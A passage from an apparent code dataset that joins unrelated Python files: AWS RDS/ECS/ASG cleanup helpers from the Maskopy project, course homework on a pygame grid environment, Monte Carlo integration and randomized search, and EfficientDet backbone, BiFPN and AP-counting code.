return delete_snapshot_cluster(rds_client, snapshot_identifier)
else:
return delete_snapshot_instance(rds_client, snapshot_identifier)
def delete_snapshot_cluster(rds_client, snapshot_identifier):
"""Function to delete snapshot.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): RDS snapshot identifer to delete
Returns:
bool: True if snapshot was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
rds_client.delete_db_cluster_snapshot(
DBClusterSnapshotIdentifier=snapshot_identifier)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBClusterSnapshotNotFound':
print(f'Snapshot, {snapshot_identifier}, already deleted.')
return True
# Check if error code is due to SNAPSHOT not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBClusterSnapshotState':
print(f"{snapshot_identifier}: RDS snapshot is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting snapshot: {snapshot_identifier}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting snapshot, {snapshot_identifier}: {err.response['Error']['Code']}.")
print(err)
return False
def delete_snapshot_instance(rds_client, snapshot_identifier):
"""Function to delete snapshot.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): RDS snapshot identifer to delete
Returns:
bool: True if snapshot was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
rds_client.delete_db_snapshot(
DBSnapshotIdentifier=snapshot_identifier)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBSnapshotNotFound':
print(f'Snapshot, {snapshot_identifier}, already deleted.')
return True
# Check if error code is due to SNAPSHOT not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBSnapshotState':
print(f"{snapshot_identifier}: RDS snapshot is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting snapshot: {snapshot_identifier}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting snapshot, {snapshot_identifier}: {err.response['Error']['Code']}.")
print(err)
return False
def delete_database(rds_client, db_identifier, engine):
"""Function to delete RDS instance.
Args:
rds_client (Client): AWS RDS Client object.
db_instance_identifier (str): RDS instance to delete
engine: The DB engine of the snapshot
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
return delete_database_cluster(rds_client, db_identifier['DBIdentifier'])
else:
return delete_database_instance(rds_client, db_identifier['DBIdentifier'])
def delete_database_cluster(rds_client, db_identifier):
"""Function to delete RDS instance.
Args:
rds_client (Client): AWS RDS Client object.
db_instance_identifier (str): RDS instance to delete
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
db_cluster_identifier=db_identifier['DBClusterIdentifier']
db_instance_identifier=db_identifier['DBInstanceIdentifier']
if db_cluster_identifier.startswith('Maskopy'):
print(f"Deleting RDS cluster in destination account: {db_cluster_identifier}")
try:
rds_client.delete_db_instance(
DBInstanceIdentifier=db_instance_identifier,
SkipFinalSnapshot=True)
rds_client.delete_db_cluster(
DBClusterIdentifier=db_cluster_identifier,
SkipFinalSnapshot=True)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBClusterNotFound':
print(f'RDS cluster, {db_cluster_identifier}, already deleted.')
return True
# Check if error code is due to RDS not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBClusterState':
print(f"{db_cluster_identifier}: RDS cluster is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting database: {db_cluster_identifier}.")
raise MaskopyThrottlingException(err)
if err.response['Error']['Code'] == 'DBInstanceNotFound':
print(f'RDS instance, {db_instance_identifier}, already deleted.')
return True
# Check if error code is due to RDS not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBInstanceState':
print(f"{db_instance_identifier}: RDS instance is not in available state.")
raise MaskopyResourceException(err)
print(f"Error deleting database cluster, {db_cluster_identifier}: {err.response['Error']['Code']}")
print(err)
return False
def delete_database_instance(rds_client, db_identifier):
"""Function to delete RDS instance.
Args:
rds_client (Client): AWS RDS Client object.
db_instance_identifier (str): RDS instance to delete
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
db_instance_identifier=db_identifier['DBInstanceIdentifier']
try:
rds_client.delete_db_instance(
DBInstanceIdentifier= db_instance_identifier,
SkipFinalSnapshot=True)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBInstanceNotFound':
print(f'RDS instance, { db_instance_identifier}, already deleted.')
return True
# Check if error code is due to RDS not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBInstanceState':
print(f"{db_instance_identifier}: RDS instance is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting database: { db_instance_identifier }.")
raise MaskopyThrottlingException(err)
print(f"Error deleting database, {db_instance_identifier}: {err.response['Error']['Code']}")
print(err)
return False
def delete_asg(asg_client, asg_name):
"""Function to delete ASG.
Args:
asg_client (Client): AWS ASG Client object.
asg_name (str): ASG and launch configuration name to delete
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
# Check if ASG exists and then delete it
asg_response = asg_client.describe_auto_scaling_groups(
AutoScalingGroupNames=[asg_name])
if asg_response['AutoScalingGroups']:
print(f'Deleting ASG: {asg_name}')
asg_client.delete_auto_scaling_group(
AutoScalingGroupName=asg_name, ForceDelete=True)
time.sleep(40)
# Check if launch configuration exists and then delete it
launch_configuration_response = asg_client.describe_launch_configurations(
LaunchConfigurationNames=[asg_name])
if launch_configuration_response['LaunchConfigurations']:
print(f'Deleting launch configuration: {asg_name}.')
asg_client.delete_launch_configuration(
LaunchConfigurationName=asg_name)
return True
except ClientError as err:
# Check if error code is ResourceContention.
if err.response['Error']['Code'] == 'ResourceContention':
print(f"ASG or launch configuration has a pending update already: {asg_name}.")
raise MaskopyResourceException(err)
# Check if error code is ResourceInUse.
if err.response['Error']['Code'] == 'ResourceInUse':
print(f"Launch configuration is still in use: {asg_name}.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting ASG: {asg_name}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting ASG, {asg_name}: {err.response['Error']['Code']}")
print(err)
return False
def deregister_task_definition(ecs_client, task_definition):
"""Function to deregister task definition.
Args:
ecs_client (Client): AWS ECS Client object.
task_definition (str): Task definition to delete
Returns:
bool: True if task definition was deregistered successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Deregistering task definition: {task_definition}')
ecs_client.deregister_task_definition(
taskDefinition=task_definition)
return True
except ClientError as err:
# Check if error code is ClientException.
if (err.response['Error']['Code'] == 'ClientException' and
err.response['Error']['Message'] ==
'The specified task definition does not exist.'):
print(f'Task definition revision, {task_definition}, does not exist.')
return True
print(f"Error deregistering task definition, {task_definition}: "
f"{err.response['Error']['Code']}")
print(err)
return False
def delete_cluster(ecs_client, cluster_name, instance_identifier=None):
"""Function to delete ECS or fargate cluster.
Args:
ecs_client (Client): AWS ECS Client object.
cluster_name (str): Cluster to delete
instance_identifier (str, optional): Instance identifier to deregister.
Classical ECS clusters require EC2 instance to be registered.
Forcing a deregister of the instance allows the ECS cluster to be
deleted.
Returns:
bool: True if cluster was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
cluster = ecs_client.describe_clusters(
clusters=[cluster_name])
if instance_identifier:
ecs_client.deregister_container_instance(
cluster=cluster_name,
containerInstance=instance_identifier,
force=True)
print('Deleting ECS Cluster:' + cluster_name)
ecs_client.delete_cluster(cluster=cluster_name)
return True
except ClientError as err:
# Check if error code is ClusterNotFoundException.
if err.response['Error']['Code'] == 'ClusterNotFoundException':
print(f'ECS cluster, {cluster_name}, already deleted.')
return True
# Check if error code is ClusterContainsContainerInstancesException.
if err.response['Error']['Code'] == 'ClusterContainsContainerInstancesException':
print(f'ECS cluster, {cluster_name}, still contains instances.')
raise MaskopyResourceException(err)
# Check if error code is ClusterContainsTasksException.
if err.response['Error']['Code'] == 'ClusterContainsTasksException':
print(f'ECS cluster, {cluster_name}, still contains tasks.')
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting ECS cluster: {cluster}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting ECS, {cluster_name}: {err.response['Error']['Code']}")
print(err)
return False
def create_account_session(sts_client, role_arn, request_id):
"""Function to create and assume account role.
Args:
sts_client (Client): AWS STS Client object.
role_arn (str): The arn of the role to assume a session.
request_id (str): UUID for session to uniquely identify session name.
Returns:
:obj:`boto3.session.Session`:
A session of the role to be used.
"""
sts_response = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=request_id
)
return boto3.session.Session(
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken']
)
class MaskopyResourceException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource.
"""
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
``` |
{
"source": "Jintao-Huang/course_homework",
"score": 3
} |
#### File: hw0/utils/environment.py
```python
import pygame
from pygame.draw import rect
from numpy.random import RandomState
import numpy as np
class PointType: # 枚举
START = -2
END = -1
BG = 0
WALL = 1
VISITED = 2
class Environment:
FPS = 10
SQUARE_SIZE = 30 # 每个小正方形的大小. 20 * 20
SCREEN_SIZE = 600, 300 # W, H
#
START_COLOR = "#379BBB"
END_COLOR = "#D24B4E"
BG_COLOR = "#A4F53C"
WALL_COLOR = "#323929" # barrier
VISITED_COLOR = "#F2DB75" # barrier
COLOR_MAP = {
PointType.START: START_COLOR, PointType.END: END_COLOR,
PointType.BG: BG_COLOR, PointType.WALL: WALL_COLOR,
PointType.VISITED: VISITED_COLOR
}
BLACK_COLOR = (0, 0, 0)
RED_COLOR = (255, 0, 0)
def __init__(self, wall_rate: float = 0.2):
square_size = self.SQUARE_SIZE
screen_size = self.SCREEN_SIZE
#
pygame.init()
screen = pygame.display.set_mode(screen_size) # W, H
pygame.display.set_caption("Environment")
fresh_clock = pygame.time.Clock()
#
self.screen = screen
self.fresh_clock = fresh_clock
self.env_matrix = np.zeros((screen_size[1] // square_size, screen_size[0] // square_size),
dtype=np.int32)
self.path = None
#
self.wall_rate = wall_rate
def init_env(self, *, env_matrix=None, random_state: int = None) -> None:
if env_matrix is not None:
self.env_matrix = env_matrix
else:
random_state = random_state if isinstance(random_state, RandomState) \
else RandomState(random_state)
self._init_env_matrix_random(random_state)
def _init_env_matrix_random(self, random_state=None):
wall_rate = self.wall_rate
env_matrix = np.ravel(self.env_matrix) # view
#
idxs = random_state.permutation(env_matrix.size)
start_idxs, end_idxs = idxs[:2]
wall_idxs = idxs[2:int(env_matrix.size * wall_rate) + 2]
env_matrix[start_idxs] = -2
env_matrix[end_idxs] = -1
env_matrix[wall_idxs] = 1
def _draw_rect(self, i: int, j: int, square_type: int):
screen = self.screen
square_size = self.SQUARE_SIZE
# 填充
rect(screen, self.COLOR_MAP[square_type],
(square_size * j + 1, square_size * i + 1, square_size - 2, square_size - 2)) # LTWH
def step(self) -> None:
screen_size = self.SCREEN_SIZE
square_size = self.SQUARE_SIZE
fps = self.FPS
fresh_clock = self.fresh_clock
env_matrix = self.env_matrix
path = self.path
#
for event in pygame.event.get():
if event.type == pygame.QUIT:
exit()
# draw
for i in range(screen_size[1] // square_size):
for j in range(screen_size[0] // square_size):
self._draw_rect(i, j, env_matrix[i, j])
if path:
self._draw_path(path)
#
pygame.display.update()
fresh_clock.tick(fps)
def _draw_path(self, path):
screen = self.screen
red_color = self.RED_COLOR
square_size = self.SQUARE_SIZE
#
path = [(square_size * pos[0] + square_size // 2,
square_size * pos[1] + square_size // 2)
for pos in path]
pygame.draw.lines(screen, red_color, False, path, 2)
```
#### File: suanfa/hw5/ex3.py
```python
from numba import njit
import random
from typing import Callable
@njit
def func(x: float) -> float:
return x ** 2 - 1
def func_integral(x: float) -> float:
return x ** 3 / 3 - x
@njit
def HitorMiss2(f: Callable[[float], float],
a: float, b: float, c: float, d: float,
n: int) -> float:
"""f: [a, b]->[c, d]"""
k = 0 # 命中
c, d = min(c, 0), max(d, 0)
S = (d - c) * (b - a)
#
for _ in range(n):
x = random.uniform(a, b)
y = random.uniform(c, d)
fx = f(x)
#
if 0 < y <= fx: # (x, y)在阴影处
k += 1
if fx <= y < 0:
k -= 1
return k / n * S
a, b, c, d = -1, 3, func(0), func(3)
print("准确解: %f" % (func_integral(b) - func_integral(a)))
#
n = int(1e8)
res = HitorMiss2(func, a, b, c, d, n)
print("n: %d, 计算的积分值: %f" % (n, res))
"""Out
准确解: 5.333333
n: 100000000, 计算的积分值: 5.337512
"""
```
#### File: suanfa/hw5/ex p67.py
```python
import random
from typing import List, Callable, Tuple, Any
import math
import numpy as np
import time
# 创建数据
n = 1000000
x = n // 2
def generate_date(n, seed=None, random=True) -> Tuple[List, List, int]:
"""
:param n:
:param seed:
:param random:
:return: val, ptr, head
"""
np.random.seed(seed)
if random:
val = np.random.permutation(n)
else:
val = np.arange(n)
ptr = np.argsort(val)
head = ptr[0]
ptr[ptr.copy()] = np.r_[ptr[1:], -1]
return list(val), list(ptr), head
val, ptr, head = generate_date(n, 30, False)
def test_time(f: Callable, *args, **kwargs) -> Tuple[float, Any]:
t = time.time()
res = f(*args, **kwargs)
return time.time() - t, res
def Search(x: int, i: int) -> int:
"""假设x在表中. 从i位置在有序表中开始查找x."""
while x > val[i]: # == 则跳出循环
i = ptr[i]
return i
def A(x: int, head: int) -> int:
return Search(x, head)
def D(x: int, head: int) -> int:
i = random.randint(0, n - 1)
y = val[i]
if x < y:
return Search(x, head)
elif x > y:
return Search(x, ptr[i])
else:
return i
def search_sqrt_n(x: int, i_list: List[int]) -> int:
"""假设x在表中. 从i_list中找不大于x的最大整数y相应的下标i, 从i处继续顺序查找."""
i = 0
max_ = int(-1e9)
for j in i_list:
y = val[j]
if max_ < y <= x: # 最接近x, 并<=x
i = j
max_ = y
return Search(x, i)
def B(x: int) -> int:
"""取前sqrt(n)个元素作为i_list"""
sqrt_n = int(math.sqrt(n)) # 下底
i_list = list(range(sqrt_n))
return search_sqrt_n(x, i_list)
def choice(x: List[int], k: int) -> List[int]:
"""在x中不放回(replace=False)的随机取k个"""
n = len(x)
for i in range(k):
idx = random.randint(i, n - 1) # [0...n-1]. 含
x[i], x[idx] = x[idx], x[i]
return x[:k]
def C(x: int) -> int:
"""随机取sqrt(n)个元素作为i_list"""
sqrt_n = int(math.sqrt(n)) # 下底
i_list = choice(list(range(n)), sqrt_n)
return search_sqrt_n(x, i_list)
ta, res_a = test_time(A, x, head)
td, res_d = test_time(D, x, head)
tb, res_b = test_time(B, x)
tc, res_c = test_time(C, x)
print("查找x: %d, n: %d. (顺序)" % (x, n))
print("A |Time: %.6f |Result: %d" % (ta, val[res_a]))
print("D |Time: %.6f |Result: %d" % (td, val[res_d]))
print("B |Time: %.6f |Result: %d" % (tb, val[res_b]))
print("C |Time: %.6f |Result: %d" % (tc, val[res_c]))
print()
#
val, ptr, head = generate_date(n, 42, True)
ta, res_a = test_time(A, x, head)
td, res_d = test_time(D, x, head)
tb, res_b = test_time(B, x)
tc, res_c = test_time(C, x)
print("查找x: %d, n: %d. (随机)" % (x, n))
print("A |Time: %.6f |Result: %d" % (ta, val[res_a]))
print("D |Time: %.6f |Result: %d" % (td, val[res_d]))
print("B |Time: %.6f |Result: %d" % (tb, val[res_b]))
print("C |Time: %.6f |Result: %d" % (tc, val[res_c]))
"""Out
查找x: 500000, n: 1000000. (顺序)
A |Time: 0.095720 |Result: 500000
D |Time: 0.054885 |Result: 500000
B |Time: 0.103692 |Result: 500000
C |Time: 0.022937 |Result: 500000
查找x: 500000, n: 1000000. (随机)
A |Time: 0.247916 |Result: 500000
D |Time: 0.250041 |Result: 500000
B |Time: 0.000998 |Result: 500000
C |Time: 0.025151 |Result: 500000
"""
``` |
{
"source": "Jintao-Huang/EfficientDet_PyTorch",
"score": 2
} |
#### File: EfficientDet_PyTorch/models/backbone.py
```python
from .efficientnet import _efficientnet
import torch.nn as nn
from .utils import IntermediateLayerGetter, freeze_layers
from .bifpn import BiFPN
from collections import OrderedDict
efficientnet_out_channels = {
# the out_channels of P3/P4/P5.
"efficientnet_b0": [40, 112, 320],
"efficientnet_b1": [40, 112, 320],
"efficientnet_b2": [48, 120, 352],
"efficientnet_b3": [48, 136, 384],
"efficientnet_b4": [56, 160, 448],
"efficientnet_b5": [64, 176, 512],
"efficientnet_b6": [72, 200, 576],
"efficientnet_b7": [72, 200, 576]
}
class EfficientNetWithBiFPN(nn.Sequential):
def __init__(self, config):
backbone_name = config['backbone_name']
pretrained_backbone = config['pretrained_backbone']
backbone_norm_layer = config["backbone_norm_layer"]
image_size = config['image_size']
backbone_freeze = config['backbone_freeze']
# -------------------------
fpn_norm_layer = config["other_norm_layer"]
fpn_channels = config['fpn_channels']
fpn_num_repeat = config['fpn_num_repeat']
# create modules
backbone = _efficientnet(backbone_name, pretrained_backbone,
norm_layer=backbone_norm_layer, image_size=image_size)
# freeze layers (自己看效果)进行freeze
if backbone_freeze:
freeze_layers(backbone, backbone_freeze)
return_layers = {"layer3": "P3", "layer5": "P4", "layer7": "P5"} # "layer2": "P2",
in_channels_list = efficientnet_out_channels[backbone_name] # bifpn
super(EfficientNetWithBiFPN, self).__init__(OrderedDict({
"body": IntermediateLayerGetter(backbone, return_layers),
"bifpn": BiFPN(fpn_num_repeat, in_channels_list, fpn_channels,
attention=True if "b6" not in backbone_name else False, # d6, d7 use b6
norm_layer=fpn_norm_layer)
}))
```
#### File: EfficientDet_PyTorch/models/bifpn.py
```python
import torch
import torch.nn as nn
from .efficientnet import get_same_padding, Swish
import torch.nn.functional as F
from collections import OrderedDict
class Conv2dSamePadding(nn.Conv2d):
"""Conv2dDynamicSamePadding
由于输入大小都是128的倍数,所以动态卷积和静态卷积的结果是一致的。此处用动态卷积代替静态卷积,因为实现方便。
Since the input size is a multiple of 128,
the results of dynamic convolution and static convolution are consistent.
Here, dynamic convolution is used instead of static convolution,
because it is convenient to implement"""
def __init__(self, in_channels, out_channels, kernel_size, stride, groups, bias):
self.kernel_size = kernel_size
self.stride = stride
super(Conv2dSamePadding, self).__init__(
in_channels, out_channels, kernel_size, stride, groups=groups, bias=bias
)
def forward(self, x):
padding = get_same_padding(x.shape[-2:], self.kernel_size, self.stride)
x = F.pad(x, padding)
x = super().forward(x)
return x
class MaxPool2dSamePadding(nn.MaxPool2d):
"""MaxPool2dDynamicSamePadding
由于输入大小都是128的倍数,所以动态池化和静态池化的结果是一致的。此处用动态池化代替静态池化,因为实现方便。
Since the input size is a multiple of 128,
the results of dynamic maxpool and static maxpool are consistent.
Here, dynamic maxpool is used instead of static maxpool,
because it is convenient to implement"""
def __init__(self, kernel_size, stride):
self.kernel_size = kernel_size
self.stride = stride
super(MaxPool2dSamePadding, self).__init__(
kernel_size, stride
)
def forward(self, x):
padding = get_same_padding(x.shape[-2:], self.kernel_size, self.stride)
x = F.pad(x, padding)
x = super().forward(x)
return x
class DepthSeparableConv2d(nn.Sequential):
"""depthwise separable convolution"""
def __init__(self, in_channels, out_channels, kernel_size, stride):
depthwise_conv = Conv2dSamePadding(in_channels, in_channels, kernel_size, stride, in_channels, False)
pointwise_conv = Conv2dSamePadding(in_channels, out_channels, 1, 1, 1, True) # 可改为False
super(DepthSeparableConv2d, self).__init__(
OrderedDict({
"depthwise_conv": depthwise_conv,
"pointwise_conv": pointwise_conv
})
)
class BiFPNBlock(nn.Module):
def __init__(self, in_channels_list, fpn_channels, attention, attention_eps, bn_momentum, bn_eps, norm_layer=None):
super(BiFPNBlock, self).__init__()
self.attention = attention
self.attention_eps = attention_eps
norm_layer = norm_layer or nn.BatchNorm2d
# create modules
if isinstance(in_channels_list, (tuple, list)): # first BiFPN block
# generate P6 and P7
self.in_blocks = nn.ModuleDict(OrderedDict({
"to_P3_0": nn.Sequential( # P3
Conv2dSamePadding(in_channels_list[0], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P4_0": nn.Sequential( # P4
Conv2dSamePadding(in_channels_list[1], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P5_0": nn.Sequential( # P5
Conv2dSamePadding(in_channels_list[2], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P6_0": nn.Sequential(
Conv2dSamePadding(in_channels_list[2], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
MaxPool2dSamePadding(3, 2)
),
"to_P7_0": MaxPool2dSamePadding(3, 2),
# P4, P5的第二条出线 (直连). P4 and P5 has two outputs
"to_P4_02": nn.Sequential( # P4
Conv2dSamePadding(in_channels_list[1], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
"to_P5_02": nn.Sequential( # P5
Conv2dSamePadding(in_channels_list[2], fpn_channels, 1, 1, 1, True),
norm_layer(fpn_channels, bn_eps, bn_momentum),
),
# P6_2 使用 P6的输出(P6_2 uses the output of P6)
}))
conv_block1 = [] # "P6_0_to_P6_1", "P5_0_to_P5_1", "P4_0_to_P4_1", "P3_0_to_P3_2"
conv_block2 = [] # "P4_1_to_P4_2", "P5_1_to_P5_2", "P6_1_to_P6_2", "P7_0_to_P7_2"
upsample_block = [] # "P7_0_to_P6_1", "P6_1_to_P5_1", "P5_1_to_P4_1", "P4_1_to_P3_2"
downsample_block = [] # "P3_2_to_P4_2", "P4_2_to_P5_2", "P5_2_to_P6_2", "P6_2_to_P7_2"
for _ in range(4):
conv_block1.append(nn.Sequential(
DepthSeparableConv2d(fpn_channels, fpn_channels, 3, 1),
norm_layer(fpn_channels, bn_eps, bn_momentum),
))
conv_block2.append(nn.Sequential(
DepthSeparableConv2d(fpn_channels, fpn_channels, 3, 1),
norm_layer(fpn_channels, bn_eps, bn_momentum),
), )
upsample_block.append(nn.UpsamplingNearest2d(scale_factor=2))
downsample_block.append(MaxPool2dSamePadding(3, 2))
self.conv_block1 = nn.ModuleList(conv_block1)
self.conv_block2 = nn.ModuleList(conv_block2)
self.upsample_block = nn.ModuleList(upsample_block)
self.downsample_block = nn.ModuleList(downsample_block)
self.swish = Swish()
# extra weight
if attention:
self.weight_relu = nn.ReLU()
self.to_P6_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P5_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P4_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P3_1_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.to_P4_2_w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.to_P5_2_w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.to_P6_2_w = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.to_P7_2_w = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
def forward(self, x):
"""
:param x: List/OrderDict(P3, P4, P5)
:return: List(P3_2, P4_2, P5_2, P6_2, P7_2)
"""
if isinstance(x, OrderedDict):
x = list(x.values())
if hasattr(self, 'in_blocks'):
P3, P4, P5 = x
# Generate P6_0, P7_0
P6_0 = self.in_blocks["to_P6_0"](P5)
P7_0 = self.in_blocks["to_P7_0"](P6_0)
# Adjust P3, P4, and P5 dimensions -> P3_0, P4_0, P5_0
in_blocks = list(self.in_blocks.values())[:3]
for i in range(3):
x.append(in_blocks[i](x.pop(0)))
# x: [P3_0, P4_0, P5_0]
# ---------------------
x += [P6_0, P7_0]
del P3, P6_0, P7_0
# x: [P3_0, P4_0, P5_0, P6_0, P7_0]
# --------------------------------
# calculate P6_1, P5_1, P4_1, P3_2
out_1 = []
conv_block1 = self.conv_block1
upsample_block = self.upsample_block
in_1 = list(reversed(x)) # [P6_0, P5_0, P4_0, P3_0]
in_2 = [x[-1]] # [P7_0]
if self.attention:
weights_1 = [self.to_P6_1_w, self.to_P5_1_w, self.to_P4_1_w, self.to_P3_1_w]
for i in range(4):
weight = self.weight_relu(weights_1[i])
weight = weight / (torch.sum(weight, dim=0) + self.attention_eps) # normalize
out_1.append(conv_block1[i](self.swish(weight[0] * in_1[i + 1] +
weight[1] * upsample_block[i](in_2[i]))))
in_2.append(out_1[-1])
del weights_1
else:
for i in range(4):
out_1.append(conv_block1[i](self.swish(in_1[i + 1] + upsample_block[i](in_2[i]))))
in_2.append(out_1[-1])
del in_1, in_2 # Prevent interference with subsequent parameter references
# out_1: [P6_1, P5_1, P4_1, P3_2]
# --------------------------------
# x: [P3_0, P4_0, P5_0, P6_0, P7_0]
# calculate P4_02, P5_02
if hasattr(self, 'in_blocks'):
out = []
inputs = [P4, P5]
in_blocks = list(self.in_blocks.values())[5:]
for i in range(2):
out.append(in_blocks[i](inputs[i]))
out += x[-2:]
x = out
del inputs, P4, P5, out
else:
x = x[1:]
# x: [P4_02, P5_02, P6_0, P7_0]
# --------------------------------
# calculate P4_2, P5_2, P6_2, P7_2
out_2 = []
conv_block2 = self.conv_block2
downsample_block = self.downsample_block
in_1 = x.copy() # [P4_02, P5_02, P6_0, P7_0]
in_2 = list(reversed(out_1))[1:] # [P4_1, P5_1, P6_1]
in_3 = [out_1[-1]] # [P3_2]
if self.attention:
weights_2 = [self.to_P4_2_w, self.to_P5_2_w, self.to_P6_2_w, self.to_P7_2_w]
for i in range(4):
weight = self.weight_relu(weights_2[i])
weight = weight / (torch.sum(weight, dim=0) + self.attention_eps)
if i == 3: # last
out_2.append(conv_block2[i](self.swish(
weight[0] * in_1[i] + weight[1] * downsample_block[i](in_3[i]))))
else:
out_2.append(conv_block2[i](self.swish(
weight[0] * in_1[i] + weight[1] * in_2[i] + weight[2] * downsample_block[i](in_3[i]))))
in_3.append(out_2[-1])
del weights_2
else:
for i in range(4):
if i == 3: # last
out_2.append(conv_block2[i](self.swish(in_1[i] + downsample_block[i](in_3[i]))))
else:
out_2.append(conv_block2[i](self.swish(in_1[i] + in_2[i] + downsample_block[i](in_3[i]))))
in_3.append(out_2[-1])
del in_1, in_2, in_3
# output = [P4_2, P5_2, P6_2, P7_2]
# --------------------------------
out_2.insert(0, out_1[-1])
return out_2 # [P3_2, P4_2, P5_2, P6_2, P7_2]
class BiFPN(nn.Sequential):
def __init__(self, fpn_num_repeat, in_channels_list, fpn_channels, attention, attention_eps=1e-4,
bn_momentum=1e-2, bn_eps=1e-3, norm_layer=None):
norm_layer = norm_layer or nn.BatchNorm2d
layers = []
for i in range(fpn_num_repeat):
layers.append(BiFPNBlock(
in_channels_list if i == 0 else fpn_channels,
fpn_channels, attention, attention_eps, bn_momentum, bn_eps, norm_layer
))
super(BiFPN, self).__init__(*layers)
```
#### File: utils/detection/ap_counter.py
```python
from torchvision.ops.boxes import box_iou
import torch
class APCounter:
def __init__(self, labels, iou_thresh=0.5):
"""
:param labels: List[str]
:param iou_thresh:
"""
self.iou_thresh = iou_thresh
self.labels = labels
# List[List[tuple(score(float), correct(bool)),...]]. 每个类一个table
self.pred_table_list = None
# List[num(int)]. 每个类分别计算
self.target_num_list = None
def init_table(self):
self.pred_table_list = [[] for _ in range(len(self.labels))]
# List[num(int)]. 每个类分别计算
self.target_num_list = [0 for _ in range(len(self.labels))]
def add(self, pred_list, target_list):
"""
:param pred_list: List[Dict]. "scores" 已按从大到小排序
:param target_list: List[Dict]
:return: None
"""
for pred, target in zip(pred_list, target_list):
pred_boxes, pred_labels, pred_scores = pred['boxes'], pred['labels'], pred['scores']
target_boxes, target_labels = target['boxes'], target['labels']
# 1. target_num_list
for target_label in target_labels:
target_label = target_label.item()
self.target_num_list[target_label] += 1
# 2. pred_table_list
have_detected = torch.zeros(target_labels.shape[0], dtype=torch.bool) # 记录已经被检测过的
for pred_box, pred_label, pred_score in zip(pred_boxes, pred_labels, pred_scores):
pred_label = pred_label.item()
pred_score = pred_score.item()
# 选择同类型的target_boxes
